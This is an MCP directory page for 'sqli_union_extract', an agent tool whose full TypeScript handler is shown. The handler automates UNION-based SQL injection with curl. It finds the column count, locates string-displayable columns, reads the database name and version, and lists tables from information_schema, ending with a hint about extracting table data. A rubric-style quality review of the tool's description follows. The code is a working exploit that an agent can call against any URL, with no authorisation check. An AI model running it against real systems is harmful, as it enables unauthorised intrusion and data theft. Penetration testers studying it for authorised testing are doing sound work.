operant-mcp

Official

Overview Schema Related Servers Score Discussions

sqli_union_extract

Extract database information from SQL injection vulnerabilities using UNION-based techniques to identify column counts, string columns, database names, versions, tables, and columns.

Instructions

Step-by-step UNION-based data extraction. 1. Finds column count via ORDER BY. 2. Identifies string-displayable columns via UNION SELECT. 3. Extracts database name and version. 4. Lists tables and columns. Returns column_count, string_columns, db_name, db_version, tables, user_columns. Side effects: Read-only GET requests. Sends ~30 requests depending on column count.

Input Schema

TableJSON Schema

Name	Required	Description
`url`	Yes	Full URL with injectable parameter, e.g. https://target/filter?category=Gifts
`parameter`	Yes	Vulnerable query parameter name
`max_columns`	No	Maximum columns to probe with ORDER BY

Implementation Reference

src/tools/sqli.ts:131-223 (handler)

Implementation of the sqli_union_extract tool handler, which automates UNION-based SQL injection to discover columns, extract DB metadata, and list tables.

server.tool(
  "sqli_union_extract",
  "Step-by-step UNION-based data extraction. 1. Finds column count via ORDER BY. 2. Identifies string-displayable columns via UNION SELECT. 3. Extracts database name and version. 4. Lists tables and columns. Returns column_count, string_columns, db_name, db_version, tables, user_columns. Side effects: Read-only GET requests. Sends ~30 requests depending on column count.",
  {
    url: z.string().describe("Full URL with injectable parameter, e.g. https://target/filter?category=Gifts"),
    parameter: z.string().describe("Vulnerable query parameter name"),
    max_columns: z.number().min(1).max(20).optional().describe("Maximum columns to probe with ORDER BY"),
  },
  async ({ url, parameter, max_columns = 10 }) => {
    requireTool("curl");
    const baseUrl = url.split("?")[0];

    // Step 1: Find column count via ORDER BY
    let columnCount = 0;
    for (let i = 1; i <= max_columns; i++) {
      const res = await runCmd("curl", [
        "-sk", "-o", "/dev/null", "-w", "%{http_code}",
        `${baseUrl}?${parameter}=' ORDER BY ${i}-- -`,
      ]);
      const status = /^\d+$/.test(res.stdout) ? parseInt(res.stdout, 10) : 0;
      if (status === 500 || status === 0) {
        columnCount = i - 1;
        break;
      }
      if (i === max_columns) {
        columnCount = max_columns;
      }
    }

    if (columnCount === 0) {
      const errResult = { error: "Could not determine column count. ORDER BY 1 failed." };
      return { content: [{ type: "text" as const, text: JSON.stringify(errResult, null, 2) }] };
    }

    // Step 2: Find string columns via UNION SELECT with markers
    const unionValues = Array.from({ length: columnCount }, (_, i) => `'col${i + 1}'`).join(",");
    const markerCmd = await runCmd("curl", [
      "-sk",
      `${baseUrl}?${parameter}=' UNION SELECT ${unionValues}-- -`,
    ]);
    const stringColumns: number[] = [];
    for (let i = 1; i <= columnCount; i++) {
      if (markerCmd.stdout.includes(`col${i}`)) {
        stringColumns.push(i);
      }
    }

    // Step 3: Extract DB name and version
    let dbRes = { stdout: "" };
    let verRes = { stdout: "" };
    if (stringColumns.length > 0) {
      const colIdx = stringColumns[0];
      const selectParts = Array.from({ length: columnCount }, (_, i) =>
        i + 1 === colIdx ? "database()" : "NULL"
      );
      dbRes = await runCmd("curl", [
        "-sk",
        `${baseUrl}?${parameter}=' UNION SELECT ${selectParts.join(",")}-- -`,
      ]);

      const selectPartsV = Array.from({ length: columnCount }, (_, i) =>
        i + 1 === colIdx ? "@@version" : "NULL"
      );
      verRes = await runCmd("curl", [
        "-sk",
        `${baseUrl}?${parameter}=' UNION SELECT ${selectPartsV.join(",")}-- -`,
      ]);
    }

    // Step 4: List tables
    let tablesRes = { stdout: "" };
    if (stringColumns.length > 0) {
      const colIdx = stringColumns[0];
      const selectPartsT = Array.from({ length: columnCount }, (_, i) =>
        i + 1 === colIdx ? "GROUP_CONCAT(table_name)" : "NULL"
      );
      tablesRes = await runCmd("curl", [
        "-sk",
        `${baseUrl}?${parameter}=' UNION SELECT ${selectPartsT.join(",")} FROM information_schema.tables WHERE table_schema=database()-- -`,
      ]);
    }

    const result = {
      column_count: columnCount,
      string_columns: stringColumns,
      db_extraction_response_snippet: dbRes.stdout.slice(0, 500),
      version_response_snippet: verRes.stdout.slice(0, 500),
      tables_response_snippet: tablesRes.stdout.slice(0, 500),
      hint: "Use the string column positions to craft targeted UNION SELECT queries for specific table data.",
    };
    return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
  }
);

Tool Definition Quality

A4.4/5.0

Behavior5/5

Does the description disclose side effects, auth requirements, rate limits, or destructive behavior?

With no annotations provided, the description carries the full burden and excels by disclosing key behavioral traits: it specifies the return values (column_count, string_columns, db_name, db_version, tables, user_columns), side effects ('read-only GET requests'), and performance characteristics ('sends ~30 requests depending on column count'). This provides comprehensive insight into the tool's operation and impact.

Agents need to know what a tool does to the world before calling it. Descriptions should go beyond structured annotations to explain consequences.

Conciseness5/5

Is the description appropriately sized, front-loaded, and free of redundancy?

The description is efficiently structured with a clear step-by-step breakdown, followed by return values and side effects. Every sentence adds value without redundancy, making it easy to scan and understand the tool's purpose and behavior quickly.

Shorter descriptions cost fewer tokens and are easier for agents to parse. Every sentence should earn its place.

Completeness4/5

Given the tool's complexity, does the description cover enough for an agent to succeed on first attempt?

Given the complexity of a multi-step SQL injection tool with no annotations and no output schema, the description does an excellent job covering behavior, returns, and side effects. However, it could slightly improve by mentioning error handling or what happens if the target isn't vulnerable, but overall it's highly complete for the context.

Complex tools with many parameters or behaviors need more documentation. Simple tools need less. This dimension scales expectations accordingly.

Parameters3/5

Does the description clarify parameter syntax, constraints, interactions, or defaults beyond what the schema provides?

The schema description coverage is 100%, so the schema already documents all three parameters (url, parameter, max_columns) adequately. The description doesn't add any additional meaning or context about the parameters beyond what the schema provides, such as examples of vulnerable parameters or guidance on setting max_columns. This meets the baseline for high schema coverage.

Input schemas describe structure but not intent. Descriptions should explain non-obvious parameter relationships and valid value ranges.

Purpose5/5

Does the description clearly state what the tool does and how it differs from similar tools?

The description clearly states the specific action ('step-by-step UNION-based data extraction') and enumerates the exact steps (finding column count, identifying string columns, extracting database info, listing tables/columns). It distinguishes itself from sibling tools like sqli_blind_boolean or sqli_login_bypass by focusing on UNION-based extraction rather than blind or authentication bypass techniques.

Agents choose between tools based on descriptions. A clear purpose with a specific verb and resource helps agents select the right tool.

Usage Guidelines4/5

Does the description explain when to use this tool, when not to, or what alternatives exist?

The description implies usage context through the step-by-step process and mentions it's for UNION-based extraction, which suggests it should be used when SQL injection vulnerabilities are suspected. However, it doesn't explicitly state when to use this tool versus alternatives like sqli_blind_boolean or sqli_file_read, nor does it mention prerequisites or exclusions.

Agents often have multiple tools that could apply. Explicit usage guidance like "use X instead of Y when Z" prevents misuse.

Install Server

Other Tools

Latest Blog Posts

Tool Definition Quality Score (TDQS)
By punkpeye on April 3, 2026.
mcp
The Hackers Who Tracked My Sleep Cycle
By punkpeye on March 26, 2026.
security
Open Source Has a Bot Problem
By punkpeye on March 19, 2026.
open source

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/operantlabs/operant-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server